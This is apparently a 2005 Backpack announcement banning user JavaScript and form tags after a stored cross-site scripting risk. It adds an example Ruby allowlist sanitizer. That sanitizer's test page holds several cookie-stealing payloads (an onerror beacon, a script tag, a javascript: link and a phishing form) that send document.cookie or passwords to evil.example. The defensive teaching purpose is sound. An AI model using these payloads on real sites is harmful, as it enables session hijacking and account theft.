Custom JavaScript and form tags prohibited for security reasons
Despite the great uses we’ve already seen of integration with Flickr and other services, we’ve unfortunately been forced to prohibit user-created JavaScript and form tags on all pages for security reasons. This means you can’t add your own JavaScript code or forms to your pages.
The problem is that prior to this update, a malicious user could trick an unsuspecting Backpack owner into accepting a shared page that contained JavaScript for stealing the session key. Because that script ran in the owner’s browser as part of a Backpack page, it could read the session key (the cookie that tells Backpack who is logged in) and send it to a server the attacker controls. Once stolen, the key could be presented to Backpack to gain access to the account without needing the password.
The technique is known as cross-site scripting, or XSS (here the stored kind, since the script was saved as part of the page and ran for whoever viewed it). And although it only affected privately shared pages (which 99% of the time are only shared with people you know and trust), it was still too much of a risk to permit. It would basically set Backpack back to the days when just opening an email in Outlook could give you a virus. We don’t want that and you don’t want that.
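As an added illustration (this is not Backpack’s own code, which the post does not show): Backpack is a Rails application, so here is a small Ruby allowlist sanitizer of the kind that enforces a rule like this one, run over a constructed shared-page snippet carrying the cookie-stealing script, an event-handler attribute, a javascript: link and a credential-harvesting form. Anything not on the allowlist is either dropped (attributes) or rendered inert as escaped text (tags and comments), so the payload shows up as visible text instead of executing in the viewer’s browser. The tag and attribute lists, the regular expressions, the evil.example host and the sample page are all assumptions made for the example.

```ruby
# Allowlist HTML sanitizer (example code, not Backpack's). Everything that is not
# explicitly permitted is either dropped (attributes) or escaped into visible text
# (tags, comments, stray "<"), so a payload can never reach the browser as markup.

# Assumed allowlist: tag name => attributes permitted on that tag.
ALLOWED_TAGS = {
  'a'   => %w[href title],
  'img' => %w[src alt title width height],
  'p' => [], 'br' => [], 'b' => [], 'i' => [], 'em' => [], 'strong' => [],
  'ul' => [], 'ol' => [], 'li' => [], 'blockquote' => []
}.freeze

# Attributes the browser treats as a URL. Only http(s), root-relative paths and
# fragments pass; javascript:, data:, vbscript: and protocol-relative //host never do.
URL_ATTRS = %w[href src].freeze
SAFE_URL  = %r{\A(?:https?://|/(?!/)|#)}i

# Tokenizer: comment | tag | run of text | a lone "<" that starts no tag.
TOKEN = /<!--.*?-->|<\/?[a-zA-Z][^>]*>|[^<]+|</m
TAG   = /\A<(\/?)([a-zA-Z][a-zA-Z0-9]*)\s*([^>]*?)\s*\/?>\z/m
ATTR  = /([a-zA-Z][a-zA-Z0-9-]*)\s*(?:=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/

def escape_html(s)
  s.gsub('&', '&amp;').gsub('<', '&lt;').gsub('>', '&gt;')
   .gsub('"', '&quot;').gsub("'", '&#39;')
end

def safe_url?(value)
  # Browsers ignore embedded whitespace and control characters, so strip them
  # first; otherwise "java\tscript:" would slip past a naive prefix check.
  SAFE_URL.match?(value.gsub(/[\u0000-\u0020]/, ''))
end

def sanitize_tag(token)
  m = TAG.match(token)
  return escape_html(token) unless m            # comments, malformed tags, lone "<"
  closing   = m[1] == '/'
  name      = m[2].downcase
  raw_attrs = m[3]
  allowed_attrs = ALLOWED_TAGS[name]
  return escape_html(token) unless allowed_attrs  # script, form, input, iframe, style, ...
  return "</#{name}>" if closing
  kept = raw_attrs.scan(ATTR).filter_map do |attr, dq, sq, bare|
    attr  = attr.downcase
    value = dq || sq || bare
    next unless allowed_attrs.include?(attr) && value   # drops onerror, onclick, style, ...
    next if URL_ATTRS.include?(attr) && !safe_url?(value)
    %( #{attr}="#{escape_html(value)}")
  end
  "<#{name}#{kept.join}>"
end

def sanitize(html)
  html.scan(TOKEN).map { |tok| tok.start_with?('<') ? sanitize_tag(tok) : tok }.join
end

# Constructed sample of a shared page carrying the attacks the post describes;
# evil.example is a placeholder host.
SHARED_PAGE = <<~HTML
  <p>Check out my photos</p>
  <img src="http://static.flickr.com/1/2_3.jpg" alt="beach" onerror="new Image().src='http://evil.example/?c='+document.cookie">
  <script>new Image().src='http://evil.example/?c='+document.cookie</script>
  <a href="javascript:document.location='http://evil.example/?c='+document.cookie">click</a>
  <form action="http://evil.example/phish"><input name="password"></form>
HTML

puts sanitize(SHARED_PAGE) if __FILE__ == $PROGRAM_NAME
```

Two design points worth noting. Rejected tags are escaped rather than deleted, so a nested trick such as `<scr<script>ipt>` cannot reassemble into a tag after one pass, and the owner can see what was removed. The regex tokenizer is only adequate for a demonstration; a real deployment should hand the markup to a proper HTML parser (in Rails, the sanitize helper backed by rails-html-sanitizer) and mark the session cookie HttpOnly as a second line of defence, which limits what a script can read but does not replace filtering.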
We are, however, dedicated to allowing integration with third party services such as Flickr through other means. We’re working on ideas for that. Thank you for your understanding. This is one of those fixes that really is for your benefit. If only the world were free of malicious users.
May 6, 2005 in Announcements
